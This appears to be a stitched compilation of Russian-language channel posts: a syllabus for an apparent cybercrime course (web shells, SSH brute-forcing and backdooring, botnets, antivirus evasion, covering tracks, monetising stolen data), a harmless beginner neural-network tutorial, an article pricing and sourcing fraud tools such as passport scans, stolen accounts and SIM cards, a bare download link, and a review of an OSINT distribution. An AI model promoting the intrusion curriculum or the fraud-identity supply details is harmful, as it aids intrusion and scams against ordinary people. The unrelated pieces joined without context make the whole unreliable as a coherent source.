• Обходим фильтрацию форм загрузки файлов для прогрузки веб шеллов
• Брутим SSH и скрываем свое присутствие
• Увеличиваем срок жизни SSH доступов или что такое SSH ключи
• Секреты вечной жизни. Бекдорим OpenSSH на Linux серверах
• Массовый сбор серверов
• Поднимаем свой DNS и льем на него трафик
• Работа по трафику
• Эксплуатация уязвимостей и методы атаки
• Монетизация всех типов данных

Malware / Вирусология

• Приватный вирус университета для лёгкого старта
• Настройка и использование вирyсов
• Работа с популярными фреймворками
• Создание и контроль ботнета
• Создание своего первого ботнета
• Первичная оценка системы
• Анализ большого потока данных
• Обход антивирусов
• Автоматизация атак при массовом распространении
• Безопасное подключение к заражённой машине
• Использование сторонних инструментов
• Как не потерять ботнет после блокировки серверa
• Заметание следов после отработки жертвы

Social / Социальная Инженерия

• СИ для распространения вирусов
• Паттерны поведения
• Ошибки и правильная стратегия в общении
• Создание убедительных аргументов
• Выбор тем и направлений работы
• Креативный подход
• Работа по хайп-направлениям
• Сбор информации для действий
• Разбор типичных ошибок
• Использование интересов для привлечения внимания
• Поиск предлогов для внедрения
• Заметание следов после отработки

Чем мы займёмся? Мы пoпрoбуем сoздать прoстую и сoвсем маленькую нейрoсеть, кoтoрую мы научим что-либо различать. При этoм не будем вдаваться в истoрию и математические дебри (такую информацию найти oчень легкo) — вместo этого пoстараемся oбъяснить задачу (не факт, что удастся) вам и самим себе рисунками и кодом.

Многие из терминов в нейронных сетях связаны с биологией, поэтому давайте начнём с самого начала:

Мозг — штука сложная, но и его можно разделить на несколько основных частей и операций:

Возбудитель может быть и внутренним (например, образ или идея):

А теперь взглянем на основные и упрощенные части мозга:

Мозг вообще похож на кабельную сеть.

Нейрон — основная единица исчислений в мозге, он получает и обрабатывает химические сигналы других нейронов, и, в зависимости от ряда факторов, либо не делает ничего, либо генерирует электрический импульс, или Потенциал Действия, который затем через синапсы подает сигналы соседним связанным нейронам:

Сны, воспоминания, саморегулируемые движения, рефлексы да и вообще все, что вы думаете или делаете — все происходит благодаря этому процессу: миллионы, или даже миллиарды нейронов работают на разных уровнях и создают связи, которые создают различные параллельные подсистемы и представляют собой биологическую нейронную сеть.

Разумеется, это всё упрощения и обобщения, но благодаря им мы можем описать простую нейронную сеть:

И описать её формализовано с помощью графа:

Тут требуются некоторые пояснения. Кружки — это нейроны, а линии — это связи между ними, и, чтобы не усложнять на этом этапе, взаимосвязи представляют собой прямое передвижение информации слева направо. Первый нейрон в данный момент активен и выделен серым. Также мы присвоили ему число (1 — если он работает, 0 — если нет). Числа между нейронами показывают вес связи.

Графы выше показывают момент времени сети, для более точного отображения, нужно разделить его на временные отрезки:

Для создания своей нейронной сети нужно понимать, как веса влияют на нейроны и как нейроны обучаются. В качестве примера возьмем кролика (тестового кролика) и поставим его в условия классического эксперимента.

Когда на них направляют безопасную струю воздуха, кролики, как и люди, моргают:

Эту модель поведения можно нарисовать графами:

Как и в предыдущей схеме, эти графы показывают только тот момент, когда кролик чувствует дуновение, и мы таким образом кодируем дуновение как логическое значение. Помимо этого мы вычисляем, срабатывает ли второй нейрон, основываясь на значении веса. Если он равен 1, то сенсорный нейрон срабатывает, мы моргаем; если вес меньше 1, мы не моргаем: у второго нейрона предел — 1.

Введем еще один элемент — безопасный звуковой сигнал:

Мы можем смоделировать заинтересованность кролика так:

Основное отличие в том, что сейчас вес равен нулю, поэтому моргающего кролика мы не получили, ну, пока, по крайней мере. Теперь научим кролика моргать по команде, смешивая раздражители (звуковой сигнал и дуновение):

Важно, что эти события происходят в разные временные эпохи, в графах это будет выглядеть так:

Сам по себе звук ничего не делает, но воздушный поток по-прежнему заставляет кролика моргать, и мы показываем это через веса, умноженные на раздражители (красным).

Обучение сложному поведению можно упрощённо выразить как постепенное изменение веса между связанными нейронами с течением времени.

Чтобы обучить кролика, повторим действия:

Для первых трёх попыток схемы будут выглядеть так:

Обратите внимание, что вес для звукового раздражителя растет после каждого повтора (выделено красным), это значение сейчас произвольное — мы выбрали 0.30, но число может быть каким угодно, даже отрицательным. После третьего повтора вы не заметите изменения в поведении кролика, но после четвертого повтора произойдет нечто удивительное — поведение изменится.

Мы убрали воздействие воздухом, но кролик все еще моргает, услышав звуковой сигнал! Объяснить это поведение может наша последняя схемка:

Мы обучили кролика реагировать на звук морганием.

В условиях реального эксперимента такого рода может потребоваться более 60 повторений для достижения результата.

Теперь мы оставим биологический мир мозга и кроликов и попробуем адаптировать всё, что узнали, для создания искусственной нейросети. Для начала попробуем сделать простую задачу.

Допустим, у нас есть машина с четырьмя кнопками, которая выдает еду при нажатии правильной кнопки (ну, или энергию, если вы робот). Задача — узнать, какая кнопка выдает вознаграждение:

Мы можем изобразить (схематично), что делает кнопка при нажатии следующим образом:

Такую задачу лучше решать целиком, поэтому давайте посмотрим на все возможные результаты, включая правильный:

Нажмите на 3-ю кнопку, чтобы получить свой ужин.

Чтобы воспроизвести нейронную сеть в коде, нам для начала нужно сделать модель или график, с которым можно сопоставить сеть. Вот один подходящий под задачу график, к тому же он хорошо отображает свой биологический аналог:

Эта нейронная сеть просто получает входящую информацию — в данном случае это будет восприятие того, какую кнопку нажали. Далее сеть заменяет входящую информацию на веса и делает вывод на основе добавления слоя. Звучит немного запутанно, но давайте посмотрим, как в нашей модели представлена кнопка:

Обратите внимание, что все веса равны 0, поэтому нейронная сеть, как младенец, совершенно пуста, но полностью взаимосвязана.

Таким образом мы сопоставляем внешнее событие с входным слоем нейронной сети и вычисляем значение на ее выходе. Оно может совпадать или не совпадать с реальностью, но это мы пока проигнорируем и начнем описывать задачу понятным компьютеру способом. Начнем с ввода весов (будем использовать JavaScript):

var inputs = [0,1,0,0];
var weights = [0,0,0,0];

// Для удобства эти векторы можно назвать

Следующий шаг — создание функции, которая собирает входные значения и веса и рассчитывает значение на выходе:

function evaluateNeuralNetwork(inputVector, weightVector){   
 var result = 0; 
 inputVector.forEach(function(inputValue, weightIndex) {
  layerValue = inputValue*weightVector[weightIndex];
   result += layerValue;
 });  
 return (result.toFixed(2)); 
}

// Может казаться комплексной, но все, что она делает — это сопоставляет пары вес/ввод и добавляет результат

Как и ожидалось, если мы запустим этот код, то получим такой же результат, как в нашей модели или графике…

evaluateNeuralNetwork(inputs, weights); // 0.00

Живой пример: Neural Net 001.

Следующим шагом в усовершенствовании нашей нейросети будет способ проверки её собственных выходных или результирующих значений сопоставимо реальной ситуации, давайте сначала закодируем эту конкретную реальность в переменную:

Чтобы обнаружить несоответствия (и сколько их), мы добавим функцию ошибки:

Error = Reality - Neural Net Output

С ней мы можем оценивать работу нашей нейронной сети:

Но что более важно — как насчет ситуаций, когда реальность даёт положительный результат?

Теперь мы знаем, что наша модель нейронной сети не работает (и знаем, насколько), здорово! А здорово это потому, что теперь мы можем использовать функцию ошибки для управления нашим обучением. Но всё это обретет смысл в том случае, если мы переопределим функцию ошибок следующим образом:

Error = <b>Desired Output</b> - Neural Net Output

Неуловимое, но такое важное расхождение, молчаливо показывающее, что мы будем использовать ранее полученные результаты для сопоставления с будущими действиями (и для обучения, как мы потом увидим). Это существует и в реальной жизни, полной повторяющихся паттернов, поэтому оно может стать эволюционной стратегией (ну, в большинстве случаев).

Далее в наш пример кода мы добавим новую переменную:

var input = [0,0,1,0];
var weights = [0,0,0,0];
var desiredResult = 1;

И новую функцию:

function evaluateNeuralNetError(desired,actual) {
 return (desired — actual);
}
// After evaluating both the Network and the Error we would get:
// "Neural Net output: 0.00 Error: 1"

Живой пример: Neural Net 002.

Подведём промежуточный итог.

Мы начали с задачи, сделали её простую модель в виде биологической нейронной сети и получили способ измерения её производительности по сравнению с реальностью или желаемым результатом. Теперь нам нужно найти способ исправления несоответствия — процесс, который как и для компьютеров, так и для людей можно рассматривать как обучение.

Как обучать нейронную сеть?

Основа обучения как биологической, так и искусственной нейронной сети — это повторение и алгоритмы обучения, поэтому мы будем работать с ними по отдельности. Начнем с обучающих алгоритмов.

В природе под алгоритмами обучения понимаются изменения физических или химических характеристик нейронов после проведения экспериментов:

Драматическая иллюстрация того, как два нейрона меняются по прошествии времени в коде и нашей модели «алгоритм обучения» означает, что мы просто будем что-то менять в течение какого-то времени, чтобы облегчить свою жизнь. Поэтому давайте добавим переменную для обозначения степени облегчения жизни:

var learningRate = 0.20;
// Чем больше значение, тем быстрее будет процесс обучения :)

И что это изменит?

Это изменит веса (прям как у кролика!), особенно вес вывода, который мы хотим получить:

Как кодировать такой алгоритм — ваш выбор, я для простоты добавляю коэффициент обучения к весу, вот он в виде функции:

function learn(inputVector, weightVector) {
 weightVector.forEach(function(weight, index, weights) {
  if (inputVector[index] > 0) {
   weights[index] = weight + learningRate;
  }
 });
}

При использовании эта обучающая функция просто добавит наш коэффициент обучения к вектору веса активного нейрона, до и после круга обучения (или повтора) результаты будут такими:

// Original weight vector: [0,0,0,0]
// Neural Net output: 0.00 Error: 1
learn(input, weights);
// New Weight vector: [0,0.20,0,0]
// Neural Net output: 0.20 Error: 0.8
// Если это не очевидно, вывод нейронной сети близок к 1 (выдача курицы) — то, чего мы и
хотели, поэтому можно сделать вывод, что мы движемся в правильном направлении

Живой пример: Neural Net 003.

Окей, теперь, когда мы движемся в верном направлении, последней деталью этой головоломки будет внедрение повторов.

Это не так уж и сложно, в природе мы просто делаем одно и то же снова и снова, а в коде мы просто указываем количество повторов:

var trials = 6;

И внедрение в нашу обучающую нейросеть функции количества повторов будет выглядеть так:

function train(trials) {
for (i = 0; i < trials; i++) {
 neuralNetResult = evaluateNeuralNetwork(input, weights);
         learn(input, weights);
}
}

Ну и наш окончательный отчет:

Neural Net output: 0.00 Error: 1.00 Weight Vector: [0,0,0,0]
Neural Net output: 0.20 Error: 0.80 Weight Vector: [0,0,0.2,0]
Neural Net output: 0.40 Error: 0.60 Weight Vector: [0,0,0.4,0]
Neural Net output: 0.60 Error: 0.40 Weight Vector: [0,0,0.6,0]
Neural Net output: 0.80 Error: 0.20 Weight Vector: [0,0,0.8,0]
Neural Net output: 1.00 Error: 0.00 Weight Vector: [0,0,1,0]
// Chicken Dinner !

Живой пример: Neural Net 004.

Теперь у нас есть вектор веса, который даст только один результат (курицу на ужин), если входной вектор соответствует реальности (нажатие на третью кнопку).

Так что же такое классное мы только что сделали?

В этом конкретном случае наша нейронная сеть (после обучения) может распознавать входные данные и говорить, что приведет к желаемому результату (нам всё равно нужно будет программировать конкретные ситуации):

Кроме того, это масштабируемая модель, игрушка и инструмент для нашего с вами обучения. Мы смогли узнать что-то новое о машинном обучении, нейронных сетях и искусственном интеллекте.

Предостережение пользователям:

• Механизм хранения изученных весов не предусмотрен, поэтому данная нейронная сеть забудет всё, что знает. При обновлении или повторном запуске кода нужно не менее шести успешных повторов, чтобы сеть полностью обучилась, если вы считаете, что человек или машина будут нажимать на кнопки в случайном порядке… Это займет какое-то время.
• Биологические сети для обучения важным вещам имеют скорость обучения 1, поэтому нужен будет только один успешный повтор.
• Существует алгоритм обучения, который очень напоминает биологические нейроны, у него броское название: правило widroff-hoff, или обучение widroff-hoff.
• Пороги нейронов (1 в нашем примере) и эффекты переобучения (при большом количестве повторов результат будет больше 1) не учитываются, но они очень важны в природе и отвечают за большие и сложные блоки поведенческих реакций. Как и отрицательные веса.

Заметки и список литературы для дальнейшего чтения

Я пытался избежать математики и строгих терминов, но если вам интересно, то мы построили перцептрон, который определяется как алгоритм контролируемого обучения (обучение с учителем) двойных классификаторов — тяжёлая штука.

Биологическое строение мозга — тема не простая, отчасти из-за неточности, отчасти из-за его сложности. Лучше начинать с Neuroscience (Purves) и Cognitive Neuroscience (Gazzaniga). Я изменил и адаптировал пример с кроликом из Gateway to Memory (Gluck), которая также является прекрасным проводником в мир графов.

Еще один шикарный ресурс An Introduction to Neural Networks (Gurney), подойдет для всех ваших нужд, связанных с ИИ.

А теперь на Python! Спасибо Илье Андшмидту за предоставленную версию на Python:

inputs = [0, 1, 0, 0]
weights = [0, 0, 0, 0]
desired_result = 1
learning_rate = 0.2
trials = 6

def evaluate_neural_network(input_array, weight_array):
    result = 0
    for i in range(len(input_array)):
        layer_value = input_array[i] * weight_array[i]
        result += layer_value
    print("evaluate_neural_network: " + str(result))
    print("weights: " + str(weights))
    return result
    
def evaluate_error(desired, actual):
    error = desired - actual
    print("evaluate_error: " + str(error))
    return error
    
def learn(input_array, weight_array):
    print("learning...")
    for i in range(len(input_array)):
        if input_array[i] > 0:
            weight_array[i] += learning_rate
            
def train(trials):
    for i in range(trials):
        neural_net_result = evaluate_neural_network(inputs, weights)
        learn(inputs, weights)
        
train(trials)

А теперь на GO! За эту версию благодарю Кирана Мэхера.

package main

import (
 "fmt"
 "math"
)

func main() {
 fmt.Println("Creating inputs and weights ...")

inputs := []float64{0.00, 0.00, 1.00, 0.00}
 weights := []float64{0.00, 0.00, 0.00, 0.00}
 desired := 1.00
 learningRate := 0.20
 trials := 6

train(trials, inputs, weights, desired, learningRate)
}

func train(trials int, inputs []float64, weights []float64, desired float64, learningRate float64) {

for i := 1; i < trials; i++ {
  weights = learn(inputs, weights, learningRate)
  output := evaluate(inputs, weights)
  errorResult := evaluateError(desired, output)

fmt.Print("Output: ")
  fmt.Print(math.Round(output*100) / 100)
  fmt.Print("\nError: ")
  fmt.Print(math.Round(errorResult*100) / 100)
  fmt.Print("\n\n")
 }

}

func learn(inputVector []float64, weightVector []float64, learningRate float64) []float64 {
 for index, inputValue := range inputVector {
  if inputValue > 0.00 {
   weightVector[index] = weightVector[index] + learningRate
  }
 }

return weightVector
}

func evaluate(inputVector []float64, weightVector []float64) float64 {
 result := 0.00

for index, inputValue := range inputVector {
  layerValue := inputValue * weightVector[index]
  result = result + layerValue
 }

return result
}

func evaluateError(desired float64, actual float64) float64 {
 return desired - actual
}

Канал

Вспомогательный бот канала

Чатик канала

Данный материал предоставлен лишь в образовательных целях и создан в рамках изучения информационной безопасности. Автор не публиковал материал для вредоносных целей. Если кто-либо воспользуется информацией для личной выгоды, то автор не несёт ответственность за любой причинённый вред или ущерб.

В интернете полно мошенников, которые для обмана людей используют «виртуальных личностей». Например, мужчин часто разводят с помощью фейковых страниц девушек, убеждая внести предоплату за интим-услуги или выслать денег «на дорогу».

Бывает сложно догадаться о том, что сетевого собеседника на самом деле не существует. Ведь у него есть несколько заполненных страниц в соцсетях, номер телефона, на который отвечает женский голос и скан паспорта. Он предоставляется по запросу особо особо бдительных жертв.

Но достать всё это очень просто. Ведь есть целая индустрия по созданию «виртуальных личностей». Она служит нуждам мошенников, коллекторов, частных детективом и лиц прочих романтических профессий.

В этой статье будет рассказано о том как делается, для чего используется и сколько стоит инвентарь для сетевого обмана: сканы документов, фейковые профили в соцсетях, левые номера и электронные кошельки. Цель написания этого материала — наглядно показать читателям, как легко можно создать/приобрести инструменты для мошенничества.

Сканы паспортов

Для чего используются

Для регистрации везде, где требуется скан паспорта. Например, в платёжных системах, онлайн-казино, торговых площадках, Forex-биржах. Для покупки доменов и имитации реальной личности при мошеннических сделках.

Примерный порядок цен

$1 за чёрно-белую копию первой страницы.

$3 за цветной скан с пропиской.

$7-$10 за фото с паспортом в руках+сканы других документов.

Так дёшево потому, что один документ можно продать неограниченное количество раз. К тому же сканы чужих паспортов и фото владельцев с ними в руках очень легко достать.

Как попадают в продажу

В поиске по слову «паспорт» на vk.com/docs наглядно видно, что множество людей сами выкладывают их в интернет. Регулярный просмотр социальных сетей, файлобменников и новых картинок в поисковой выдаче Google даёт мошенникам неплохой «урожай».

Также есть различные схемы, когда людей обманом заставляют высылать сканы паспортов. Например, «игриво настроенная девушка», она же девятиклассник Фёдор, пишет мужчине на сайте знакомств: «Приезжай ко мне в гости прямо сейчас, но сначала вышли скан паспорта, чтобы я могла тебе доверять» или «Вы приняты на работу контент-менеджером, оплата 10 тысяч в день, вышлите документы для оформления в штат».

Разумеется, скан паспорта можно просто нарисовать. Ещё лет 10 назад для этого сделали специальную программу RF SCreater. Если вписать в поддельный документ данные реального человека, то он будет проходить проверки по базам.

Законность.

Если факт регистрации домена/аккаунта в онлайн-казино на поддельный паспорт раскроется, то сервис заблокирует вас и других пользователей, который использовали такой же скан. Если ваш документ будет применён для мошенничества и будет заведено уголовное дело, то вам, возможно, надо будет в суде доказывать непричастность к преступлению.

Профили в социальных сетях

Для чего используются

Реклама, рассылка спама, накрутка подписчиков и лайков, имитация реальной личности при мошенничестве.

Примерный порядок цен

2-20 рублей — автоматически зарегистрированные и заполненные профили, у которых в друзьях такие же топорные фейки.

50-3000 рублей — аккаунты живых людей, которые не аккуратно обращались со своими паролями или добровольно решили продать аккаунт. Цена, в первую очередь, зависит от количества и качества друзей (пол, возраст, город, процент ботов) и возраста аккаунта. Иногда делает цену выше красивый ID страницы. Например, 4-значный у страниц Вконтакте.

От 3000 рублей и выше — аккаунты, которые имеют более 10 тысяч друзей/подписчиков, а также аккаунты-администраторы популярных групп и сообществ.

Как попадают в продажу

Автоматически регистрируются с помощью ботов, похищаются у владельцев с помощью фишинговых ссылок и кейлоггеров, восстанавливаются после блокировки на новую симку (так называемый «ретрив»), вручную создаются и раскручиваются для последующей продажи. Купить можно аккаунты всех популярных соцсетей. Этим бизнесом занимаются люди по всему миру.

Законность сделки

Правилами cоциальных сетей продажа аккаунтов запрещена. Теоретически, нарушение грозит баном профиля.

Симкарты

Для чего используются

Для автоматической регистрации в соцсетях и платежных системах, для имитация реальной личности при мошенничестве. Красивые номера и номера с выгодными тарифами используются чаще для обычных человеческих нужд.

Примерный порядок цен

5-10 рублей за штуку — простые симкарты (часто зарегистрированную на левую компанию). Продаются большими пакетами.

500-3000 рублей — симкарты с особо выгодными корпоративными тарифами или теми, которые продавались ограниченными партиями.

5000-300 000 рублей — симкарты с красивыми комбинациями цифр. Так называемые, «серебрянные», «золотые» и «платиновые» номера.

Как попадают в продажу

Люди на форумах утверждают, что ими торгуют предприимчивые сотрудники салонов сотовой связи. Также симкарты привозят из Украины, где они продаются свободно.

Законность

Продажа симкарт без паспорта в России запрещена. Продавцам грозит штраф 5000 рублей для физических лиц, а 200 тысяч для юридических.

Электронные кошельки

Для чего используются

Для обналички и приема платежей от жертв при осуществлении мошеннических схем.

Примерный порядок цен

10-30 рублей за простой автоматически зарегистрированный QIWI-кошелек.

1000-3000 рублей за WebMoney-аккаунт с аттестатом «Начальный» или QIWI-кошелек со статусом «Максимальный» или аккаунт Яндекс.Денег со статусом «Идентифицированный».

$120 (14 000 рублей) за полностью верифицированный американский аккаунт PayPal.

Как попадают в продажу

Автоматически регистрируются на левые симкарты, а данные пользователя подтверждаются фальшивыми сканами документов.

Законность

Правилами платежных систем передавать свои кошельки третьим лицам запрещено. За нарушение бан без возврата средств. В зависимости от ситуации, пользователей таких кошельков могут наказать за мошенничество или уклонение от налогов.

Виртуалы

Большинство людей довольно подозрительны. Они ищут информацию о личностях, с которыми делают какие-либо дела в разных источниках, но проникаются доверием очень легко. Бдительность усыпляет заполненный Instagram, скан паспорта с соответствующим лицом и разговор по телефону с человеком соответствующего пола.

Если сложить все вышеописанные четыре раздела статьи вместе, то получится «виртуальная личность». Она может быть использована для разных видов мошенничества: выманивания денег «на дорогу» и «в долг» на сайтах знакомств, приём предоплаты за несуществующие товары, вербовка в секты, сбор денег на благотворительность. Схем тысячи и их описание выходит за рамки этой статьи.

Примерный порядок цен

$15 — $100 в зависимости от естественности и «заполненности» виртуала.

Только что созданные и наспех заполненные несколько страниц в разных социальных сетях + пара электронных кошельков будет стоить долларов 20.

Естественно выглядящие аккаунты с долгой историей и сканами документов около $50.

100 долларов и выше будет стоить несколько очень качественных фейковых страниц в соцсетях+личный сайт+никнейм засвеченный на разных форумах+сканы документов + виртуальный номер телефона.

Как попадают в продажу

Делаются специально обученным людьми с помощью набора автоматизирующих инструментов.

Законность

Создание виртуалов противоречит правилам соцсетей и платежных систем. Кроме того, эта деятельность может рассматриваться как соучастие в преступлении.

Из всего этого есть три основных вывода: не выкладывайте сканы документов в открытый доступ и на файобменники, соблюдайте правила создания, хранения и ввода паролей при использовании соцсетей и будьте предельно внимательны при общении с людьми, которых вы не знаете в реале. Особенно, если переводите им деньги.

Канал

Вспомогательный бот канала

Чатик канала

Данный материал предоставлен лишь в образовательных целях и создан в рамках изучения информационной безопасности. Автор не публиковал материал для вредоносных целей. Если кто-либо воспользуется информацией для личной выгоды, то автор не несёт ответственность за любой причинённый вред или ущерб.

Ссылка на скачивание:https://yadi.sk/d/cBDUDWsuTuuWog?w=1

Канал

Вспомогательный бот канала

Чатик канала

Сегодня мы с вами поговорим о CSI Linux, разработанным настоящими детективами для киберкриминалистического расследования. Это один из лучших дистрибути́вов для OSINT разведки, реверс инженеринга и выявления вторжений, содержащий безумные количества всеможножных профильных утилит, как для работы в клирнете, так и для расследования в даркнет сетях.

Предисловие

От большого брата теперь не скрыться. Тысячи виртуальных "глаз" следят за вами и создают подробное цифровое досье, которое можно купить, продать или даже украсть. Умные игрушки, видео-няни собирают данные об увлечениях детей и отправляют производителям. Умная цифровая техника собирает данные и предоставляет ваши секреты корпорациям. В любой момент кто-то может перехватить контроль над вашим автомобилем или смартфоном. Вам кажется, что на вас это никак не отразится, но знайте — ваша цифровая тень уже в зоне риска, страховщики изучают ваш образ жизни, чтобы определить условия страхования, медучереждения вычисляют приблизительный год, когда вы умрёте, чтобы понять стоит ли вас лечить, изучая ваши действия в сети специалисты внушают вам чему верить и за кого голосовать. Ценность вашей жизни измеряется в байтах. Таков новый порядок, выйти из системы невозможно, но есть те, кто готов защищать свободу до последнего: активисты, разоблачители, хакеры.
Всё это — серьёзная проблема для новой элиты.
Кто все эти люди: угроза или последний шанс простых людей отстоять свободу?

CSI Linux | Структура

Итак, возвращаясь к теме моей статьи.

• CSI Linux представляет из себя слияние целых 3 операционных систем, которые распространяются в виде образа виртуальных машин.
• Для системы требуется большой объём: как минимум 50 гб для запуска образа и не менее 8 гб оперативной памяти для полноценного функционирования.
• Вся система разделена на: CSI Linux Analyst, CSI Linux Gateway и CSI Linux SIEM.

CSI Linux Analyst — это основная рабочая станция для расследований, она используется для цифровой криминалистики, содержит инстументы для расследования, сбора, анализа и составления отчётов об инцидентах.

CSI Linux Gateway — отправляет весь трафик от CSI Linux Analyst через сеть Tor, чтобы скрыть исходный ip адрес для дополнительной безопасности, а также используется чтобы взаимодействовать с даркнет сервисами и проводить их разведку.

CSI Linux SIEM — используется для реагирования на инценденты и обнаружение вторжения, если наша система скомпрометирована, мы можем использовать инструмент SIEM для проверки уязвимости системы.

CSI Linux Analyst | Основная рабочая станция

Начнём с основной системы.

CSI Linux Analyst имеют удобное графическое окружение, внизу системы расположена панелька с основными утилитами. Во первых тут 3 браузера: хром, файрфокс и тор браузер.

За ними следует утилита OnionShare — это инструмент для относительно анонимного и безопасного обмена файлами через сеть tor, onion share запускает на локальной системе web сервер, он работает в форме скрытого сервиса tor, делает его доступным для других нужных нам пользователей, которые могут скачать раздаваемые нами файлы.

Вслед за этой утилитой следует программа KeePassXC — это менеджер хранения паролей, где мы можем создавать базу и в ней хранить безопасно пароли от различных сервисов и держать всё в зашифрованном виде.

Затем мы можем наблюдать GNU Privacy Assistant — он представляет собой графический интерфейс для GNUPG, он необходим для генерирования, хранения и работы с различными ключами шифрования.

Далее идёт мессенджер qTox — он нужен для децентрализованной текстовой, голосовой и видео связи на основе ассиметричного шифрования, а также мессенджер Pidgin — с помощью него вы можете выстроить конфиденциальное общение по различным непрослушиваемым протоколам.

Затем начинаются профильные программы нашего дистрибутива.

• Первая из них Hunchly, она представляет из себя специализированный инструмент для захвата вебстраниц, предназначена для проведения исследования OSINT, она будет сохранять и каталогизировать веб-страницы, фотографии, файлы, метаданные, иными словами всё, что вы будете использовать в рамках своего расследования, тем самым облегчая вам поиск цифровых доказательств, но и предотвращая их утерю если эти данные доказательства будут удалены из общего доступа.
• Следующий профессиональный инструмент — Social Media Search Application —это специальный скрипт, объединяющий в себе инструменты пробива и поиска по нику, имени,фамилии, номера мобильного телефона на предмет упоминания в различных социальных сетях, популярных сервисах и сайтах.
• Если вам знакомы такие инструменты как Sherlock, SpiredFoot и похожие, то все их вы здесь найдёте. А если вам понадобится информация о сайте или домене, то на выручку вам придёт программа Domain Interrogation Tool, в свою очередь тут вы найдёте трек для сбора всех поддоменов нужной цели, хардвёрс, metagootfil для извлечения метаданных публичных документов, которые расположены на исследуемом сайте. Все эти программы присутствуют в данном скрипте.
• Затем у нас следует знаменитое Maltego, наверное, самый популярный инструмент для построения и анализа связей между различными объектами расследования, визуализации данных и разведки на основе открытых источников OSINT. Если вам нужно выявить какие-то взаимосвязи между сайтами, компаниями, ip адресами, номерами телефонов или ещё какие-либо данными, то Maltego — отличный инструмент в вашем расследовании.
• Далее у нас идут уже инструменты форензики и киберкриминалистики. Autopsy — это инструмент с открытым исходным кодом, он используется полицией, военными или корпаративными экспертами для расследования того, что произошло на компьютере, полезно если вам необходимо обнаружить удалённые файлы жёсткого диска, извлечь историю браузера или куки, найти методанные на фото, отсортировать файлы на диске по определённым характеристикам, с этой штукой даже можно восстановить удалённые видео с карт памяти видеокамер и телефонов, это весьма полезно при определённых обстоятельствах.
• Следующий инструмент в моём обзоре прямиком из агенства национальной безопасности США, это — Ghidra.
  Ghidra — платформа для реверс инженеринга, программное обеспечение разработанное АНБ, оно помогает анализировать вредоносные код и вредоносные программы, может дать понимание потенциальных уязвимостей в сетях и системах. Её возможности включают разборку, сборку, декомпеляцию, создание графиков или сценариев, в общем широкий простор для инженеров обратной разработки.

В CSI Linux также присутствуют и более повседневные программы:

CherryTree — приложения для создания иерархических заметок и пакета программ LibreOffice для работы с офисными документами.

CSI Linux Gateway | Шлюз TOR

Мы плавно подошли к кнопкам управления трафика, а именно мы можем перенаправлять весь наш трафик от машины CSI Analyst в машину Gateway CSI,которая является шлюзом в сеть tor.
Cхожая реализация была в системе Whonix. Для этого просто запускаем Gateway, как дополнительную машину, а после активируем, далее поменяется картинка рабочего стола, это сделано для удобства и дабы вы не запутались куда именно течёт ваш трафик, а на выходе мы будем иметь ip адрес tora. Кроме того, что теперь все наши разведывательные действия приобрели плюс к анонимизации, теперь все наши инструменты о которых я рассказывал ранее можно применить и для расследования внутри сети tor, анализа даркнет сайтов и их пользователей. Когда же мы захотим пользоваться обычным клирнетом, то мы можем снова вернуть всё на место, деактивировав скрипт одним нажатием.

CSI LINUX SIEM | Мониторинг и проверка уязвимостей

Теперь мы подошли к использованию CSI LINUX SIEM. Запустив её и CSI Analyst вместе, а также активировав специальный скрипт для маршрутизации трафика, мы можем использовать встроенную программу Kibana. Она создана для использования и мониторинга, анализа it инфраструктуры, а также alastic search для проверки уязвимости всей системы.

Помимо всех перечисленных инструментов, CSI Linux также хранит в себе безумно большое количество инструментов для OSINT разведки, конфиденциального общения, скрипты для работы с сетями i2p, freenet, криптокошельки, инструменты для брутфорсинга учётных записей пользователя и для парольных фраз, для доступа к криптоконтейнеру. Далее, тут есть интументы для криминалистической экспертизы, мобильных устройств и ещё множество инструментов безусловно достоенных вашего внимания.

В конце статьи хотелось бы сказать, CSI Linux на сегодняшний момент безусловно является одним из лучших дистрибутивов для нетсталкеров, мастеров пробива или хакеров.

Конечно, он достаточно сложен в освоении, большой по объёму и требователен к железу, однако, это всё же того стоит, а реализация за счёт гипервизора, как вы уже могли заметить, близка к моим личным предпочтениям. Надеюсь, что данная статья побудит вас попробовать этого разведовательного монстра в действии.

Также выложу для вас ссылки которые помогут разобраться немного с CSI Linux и его утилитами.

• CSI LINUX - https://csilinux.com/
• Maltego - https://www.maltego.com/
• Autopsy - https://www.sleuthkit.org/autopsy/
• Ghidra - https://ghidra-sre.org/
• qTox - https://qtox.github.io/
• Kibana - https://www.elastic.co/kibana
• OSINTFramework - https://osintframework.com/
• OSINT-Search - https://github.com/am0nt31r0/OSINT-Search
• Spiderfoot - https://www.spiderfoot.net/

Это лишь несколько инструментов, само собой там их намного больше.

Канал

Вспомогательный бот канала

Чатик канала